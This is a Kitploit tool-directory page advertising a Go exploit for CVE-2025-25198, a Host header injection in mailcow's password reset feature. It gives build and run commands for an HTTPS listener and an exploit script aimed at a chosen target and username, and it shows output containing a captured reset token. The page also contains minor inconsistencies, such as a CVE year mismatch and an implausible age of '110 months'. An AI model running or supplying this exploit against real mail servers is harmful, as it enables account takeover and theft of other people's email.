Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-25198 — Captures password reset tokens from Mailcow Host header injection attacks. | Kitploit
Tools/GitHubGitHub/enzocipher/cve-2025-25198
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubenzocipher/cve-2025-25198

CVE-2025-25198

Captures password reset tokens from Mailcow Host header injection attacks.

View Repository
110 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-25198

mailcow: dockerized is an open source groupware/email suite based on docker. Prior to version 2025-01a, a vulnerability in mailcow's password reset functionality allows an attacker to manipulate the Host HTTP header to generate a password reset link pointing to an attacker-controlled domain. This can lead to account takeover if a user clicks the poisoned link.

How works?

Sets up an https server to hear al requests and sends a POST Request to the website with the Host header with your selected . You can also use Burpsuite to send the request and get the Token in the server.

Features

  • HTTPS server that retrieves the Password Change Token
  • Exploit script that attacks the website vulnerability.
  • Fixed Everything and no longer requires openssl to work

Prerequisites

  • Go 1.16 or higher

Server Script

root@kitploit:~
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server

Exploit Script

root@kitploit:~
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port>  <--insecure | optional >

After waiting a bit the server will output the token that you can use :

root@kitploit:~
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
Download Tool